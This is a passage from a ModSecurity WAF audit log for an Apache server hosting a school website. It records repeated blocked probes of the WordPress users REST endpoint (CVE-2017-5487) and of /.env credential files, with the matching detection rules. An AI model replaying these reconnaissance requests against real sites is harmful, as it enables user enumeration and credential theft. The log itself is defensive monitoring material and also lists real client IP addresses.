[rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747603194472537 708 (- - -) Stopwatch2: 1747603194472537 708; combined=281, p1=243, p2=0, p3=0, p4=0, p5=37, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30e15515-Z-- --153dd475-A-- [19/May/2025:04:32:40 +0700] aCpR-GyGBQNQTJej4E58IQAAAJM 103.236.140.4 43226 103.236.140.4 8181 --153dd475-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.58.249.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.58.249.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --153dd475-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --153dd475-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747603960886337 3182 (- - -) Stopwatch2: 1747603960886337 3182; combined=1320, p1=434, p2=847, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --153dd475-Z-- --a9c05329-A-- [19/May/2025:04:42:49 +0700] aCpUWWyGBQNQTJej4E58LAAAAIY 103.236.140.4 43292 103.236.140.4 8181 --a9c05329-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.73.193.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.73.193.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9c05329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9c05329-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747604569436583 3168 (- - -) Stopwatch2: 1747604569436583 3168; combined=1412, p1=471, p2=908, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9c05329-Z-- --02119742-A-- [19/May/2025:04:47:05 +0700] aCpVWTuVdcwZ_qZ5ZIoanQAAABA 103.236.140.4 43324 103.236.140.4 8181 --02119742-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02119742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02119742-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747604825814939 3341 (- - -) Stopwatch2: 1747604825814939 3341; combined=1456, p1=504, p2=920, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02119742-Z-- --6c71f23a-A-- [19/May/2025:05:15:08 +0700] aCpb7GyGBQNQTJej4E58NgAAAIE 103.236.140.4 43504 103.236.140.4 8181 --6c71f23a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --6c71f23a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c71f23a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747606508936535 826 (- - -) Stopwatch2: 1747606508936535 826; combined=325, p1=285, p2=0, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c71f23a-Z-- --df49b371-A-- [19/May/2025:05:19:22 +0700] aCpc6r8BMImlI6dyVePKrAAAAMc 103.236.140.4 43526 103.236.140.4 8181 --df49b371-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.189.18.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df49b371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df49b371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747606762791218 3485 (- - -) Stopwatch2: 1747606762791218 3485; combined=1508, p1=527, p2=949, p3=0, p4=0, p5=32, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df49b371-Z-- --e088d434-A-- [19/May/2025:05:19:27 +0700] aCpc7wZaP57SewDBUi85AQAAAFE 103.236.140.4 43528 103.236.140.4 8181 --e088d434-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 131.161.125.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 131.161.125.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e088d434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e088d434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747606767920163 2965 (- - -) Stopwatch2: 1747606767920163 2965; combined=1263, p1=437, p2=796, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e088d434-Z-- --c00b4015-A-- [19/May/2025:05:35:11 +0700] aCpgn78BMImlI6dyVePKsQAAAM0 103.236.140.4 43612 103.236.140.4 8181 --c00b4015-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.25.241.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.25.241.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c00b4015-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c00b4015-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747607711637013 3473 (- - -) Stopwatch2: 1747607711637013 3473; combined=1538, p1=533, p2=973, p3=0, p4=0, p5=31, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c00b4015-Z-- --219c8061-A-- [19/May/2025:06:05:26 +0700] aCpntmyGBQNQTJej4E58TQAAAIQ 103.236.140.4 43774 103.236.140.4 8181 --219c8061-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --219c8061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --219c8061-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747609526966835 3488 (- - -) Stopwatch2: 1747609526966835 3488; combined=1520, p1=546, p2=943, p3=0, p4=0, p5=31, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --219c8061-Z-- --fb4bb43d-A-- [19/May/2025:06:36:11 +0700] aCpu678BMImlI6dyVePLZgAAANQ 103.236.140.4 45292 103.236.140.4 8181 --fb4bb43d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.179.100.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.179.100.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fb4bb43d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb4bb43d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747611371510113 2905 (- - -) Stopwatch2: 1747611371510113 2905; combined=1242, p1=418, p2=800, p3=0, p4=0, p5=24, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb4bb43d-Z-- --79779752-A-- [19/May/2025:06:49:23 +0700] aCpyA78BMImlI6dyVePM_gAAANA 103.236.140.4 47692 103.236.140.4 8181 --79779752-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.100.25.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.100.25.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --79779752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79779752-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747612163638153 3211 (- - -) Stopwatch2: 1747612163638153 3211; combined=1308, p1=441, p2=837, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79779752-Z-- --c1004e19-A-- [19/May/2025:06:56:34 +0700] aCpzsjuVdcwZ_qZ5ZIocZgAAAAc 103.236.140.4 47738 103.236.140.4 8181 --c1004e19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.254.186.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.254.186.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1004e19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1004e19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747612594766864 3430 (- - -) Stopwatch2: 1747612594766864 3430; combined=1478, p1=488, p2=953, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1004e19-Z-- --4a8ccf13-A-- [19/May/2025:07:48:26 +0700] aCp_2r8BMImlI6dyVePRBQAAAM8 103.236.140.4 36134 103.236.140.4 8181 --4a8ccf13-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4a8ccf13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a8ccf13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747615706983908 841 (- - -) Stopwatch2: 1747615706983908 841; combined=352, p1=305, p2=0, p3=0, p4=0, p5=47, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a8ccf13-Z-- --35b3c97a-A-- [19/May/2025:07:48:28 +0700] aCp_3L8BMImlI6dyVePRBwAAANU 103.236.140.4 36138 103.236.140.4 8181 --35b3c97a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --35b3c97a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35b3c97a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747615708434693 701 (- - -) Stopwatch2: 1747615708434693 701; combined=296, p1=264, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35b3c97a-Z-- --167fd06e-A-- [19/May/2025:08:37:16 +0700] aCqLTAZaP57SewDBUi9DHwAAAEs 103.236.140.4 36518 103.236.140.4 8181 --167fd06e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.97.99.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.97.99.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --167fd06e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --167fd06e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747618636978940 3420 (- - -) Stopwatch2: 1747618636978940 3420; combined=1523, p1=550, p2=942, p3=0, p4=0, p5=31, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --167fd06e-Z-- --8ee37b6d-A-- [19/May/2025:08:39:00 +0700] aCqLtGyGBQNQTJej4E6KCAAAAJM 103.236.140.4 36540 103.236.140.4 8181 --8ee37b6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.66.230.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.66.230.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ee37b6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ee37b6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747618740177883 3451 (- - -) Stopwatch2: 1747618740177883 3451; combined=1516, p1=544, p2=941, p3=0, p4=0, p5=31, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ee37b6d-Z-- --da6f4546-A-- [19/May/2025:09:36:31 +0700] aCqZL78BMImlI6dyVePR-wAAAME 103.236.140.4 38650 103.236.140.4 8181 --da6f4546-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 135.181.153.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 135.181.153.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --da6f4546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da6f4546-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747622191758519 2951 (- - -) Stopwatch2: 1747622191758519 2951; combined=1293, p1=438, p2=826, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da6f4546-Z-- --00b5e226-A-- [19/May/2025:09:39:31 +0700] aCqZ42yGBQNQTJej4E6LNgAAAIM 103.236.140.4 38688 103.236.140.4 8181 --00b5e226-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.225.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.225.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00b5e226-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00b5e226-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747622371198590 3138 (- - -) Stopwatch2: 1747622371198590 3138; combined=1348, p1=486, p2=834, p3=0, 